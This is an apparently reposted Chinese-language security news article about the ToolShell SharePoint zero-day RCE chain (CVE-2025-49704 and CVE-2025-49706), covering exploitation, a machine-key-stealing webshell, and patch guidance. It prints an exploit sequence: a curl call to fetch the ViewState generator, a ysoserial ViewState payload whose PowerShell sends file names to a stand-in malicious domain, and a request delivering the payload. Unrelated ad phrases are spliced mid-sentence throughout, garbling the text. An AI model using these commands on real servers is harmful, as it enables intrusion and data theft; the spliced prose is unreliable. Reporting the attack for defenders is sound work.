数据观澜物联网
快捷导航
您的位置:首页>人工智能>>工具链漏洞预警:全球活跃利用中的SharePoint新型零日RCE攻击链 >

工具链漏洞预警:全球活跃利用中的SharePoint新型零日RCE攻击链

  发布时间:2025-12-07 20:37:09   作者:玩站小弟   我要评论
图片来源:CODE WHITE GmbH2025年7月18日晚间,Eye Security安全团队发现一起大规模利用新型Microsoft SharePoint远程代码执行RCE)漏洞链的攻击活动,该 。

图片来源:CODE WHITE GmbH

2025年7月18日晚间,工具攻击Eye Security安全团队发现一起大规模利用新型Microsoft SharePoint远程代码执行(RCE)漏洞链的链漏链攻击活动,该漏洞链被命名为ToolShell。洞预的攻击者通过组合利用CVE-2025-49704和CVE-2025-49706两个漏洞 ,警全可在无需认证的球活情况下完全控制本地部署的SharePoint服务器 。

"这并非凭证泄露问题 ,跃利用中而是建站模板新型零已被武器化的Pwn2Own漏洞利用代码在野利用",Eye Security特别强调。工具攻击

漏洞技术细节

ToolShell攻击链包含两个关键漏洞 :

CVE-2025-49706(CVSS 6.3) :SharePoint服务器欺骗漏洞CVE-2025-49704(CVSS 8.8) :通过ToolPane端点触发的链漏链SharePoint RCE漏洞

初步分析认为攻击需要有效凭证,但深入调查显示实际无需任何认证 。洞预的报告指出:"对/_layouts/15/ToolPane.aspx的警全POST请求特征非常明显...我们确信攻击全程未使用任何凭证" 。

攻击手法分析

攻击基于Code White GmbH曾在Pwn2Own上演示的云计算球活概念验证代码 ,现已被完全武器化 。跃利用中成功利用后,新型零攻击者可直接植入隐蔽的工具攻击ASPX恶意负载而无需登录 。已观测到的恶意文件spinstall0.aspx疑似基于Sharpyshell开发 ,其设计目的并非直接执行命令  ,而是服务器租用窃取加密机器密钥 。

"这不是典型的网页后门...该页面通过调用.NET内部方法读取SharePoint服务器的MachineKey配置" ,研究人员解释  。这些密钥(如ValidationKey和DecryptionKey)用于生成有效的__VIEWSTATE令牌——这是ASP.NET的核心安全机制 。香港云服务器获取密钥后,攻击者可使用ysoserial等工具签署恶意负载实现完全远程代码执行 。

复制# 通过任意公开SharePoint页面获取<VIEWSTATE_GENERATOR> curl -s https://target/_layouts/15/start.aspx | grep -oP __VIEWSTATEGENERATOR" value="\K[^"]+ # 生成viewstate攻击负载示例 ysoserial.exe -p ViewState -g TypeConfuseDelegate \ -c "powershell -nop -c \"dir C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\TEMPLATE\LAYOUTS | % { Invoke-WebRequest -Uri (http://malicious-domain/?f= + [uri]::EscapeDataString($_.Name)) }\"" \ --generator="<VIEWSTATE_GENERATOR>" \ --validationkey="<VALIDATION_KEY>" \ --validationalg="<VALIDATION_ALG>" \ --islegacy \ --minify # 将生成的令牌附加至请求即可执行命令(RCE) curl http://target/_layouts/15/success.aspx?__VIEWSTATE=<YSOSERIAL_GENERATED_PAYLOAD>1.2.3.4.5.6.7.8.9.10.11.12.13.14.

"这些负载可嵌入任意恶意命令 ,并被服务器视为可信输入,最终在无需凭证的情况下完成RCE攻击链" ,报告补充道。

影响范围与响应措施

Eye Security扫描了8,000余台暴露在公网的SharePoint服务器 ,免费模板发现数十台已遭入侵 。通过分析160字节的独特响应特征和spinstall0.aspx端点可识别受影响系统 。

截至7月19日,Palo Alto Networks Unit 42确认攻击仍在持续 ,观测到攻击者:

通过PowerShell投放恶意ASPX负载窃取机器密钥建立持久化访问从可疑IP(如96[.]9[.]125[.]147)执行攻击模块

微软已发布紧急补丁和安全指南 ,建议本地部署SharePoint的用户立即采取以下措施:

安装7月补丁星期二发布的最新SharePoint更新扫描入侵痕迹 ,重点检查/ToolPane.aspx和/spinstall0.aspx路径检查加密密钥是亿华云否泄露,如已失窃需立即重新生成监控HTTP(S)外联连接和反向Shell活动
  • Tag:

相关文章

  • 密码管理巨头LastPass遭遇网络攻击,源代码已泄露

    据Bleeping Computer报道,密码管理巨头 LastPass 两周前遭到黑客攻击,尽管公司在发现攻击行为后已经拼命进行阻止,但是结果令人感到惋惜,黑客依旧突破了封锁,可窃取该公司的源代码和
    2025-12-07

  • u深度安装Linux教程(轻松学习如何在u深度上安装Linux系统)

    对于想要在u深度操作系统上安装Linux系统的用户来说,本篇文章将为您提供一份简明扼要的教程。在这个教程中,我们将逐步指导您完成安装过程,以帮助您轻松地在u深度上运行Linux系统。无论您是初学者还是
    2025-12-07

  • 使用U盘安装Win7系统的详细教程(轻松安装Win7系统,让电脑重新焕发活力)

    在使用电脑的过程中,难免会遇到系统崩溃或运行速度变慢的情况。为了解决这些问题,重新安装操作系统是一个常见的解决办法。本文将详细介绍如何使用U盘安装Win7系统,帮助您轻松完成系统安装,让电脑重新焕发活
    2025-12-07

  • 一种跳板机的实现思路

    作者 | vivo 互联网运维团队- Yang Lei本文介绍了一种跳板机实现思路,阐述了基本原理,并讲解了特点和相对优势。一、跳板机思路简介本文所描述的跳板机下文称为“jmp”)支持:Linux服务
    2025-12-07

  • 恶意软件趋势:旧即新

    许多最成功的网络犯罪分子都很精明;他们想要良好的投资回报率,但他们不想重新发明轮子才能获得它。​很明显,网络犯罪是世界上最赚钱的非法产业之一——可能占据头把交椅。由于与投资回报相关的自有品牌关键绩效指
    2025-12-07

  • AU6990量产工具教程(掌握AU6990量产工具,助力生产效率提升)

    随着电子产品的快速发展,量产工具的使用已经成为企业生产过程中不可或缺的环节。AU6990量产工具作为一款功能强大、易于操作的工具,被广泛应用于存储设备的批量生产中。本文将详细介绍AU6990量产工具的
    2025-12-07

最新评论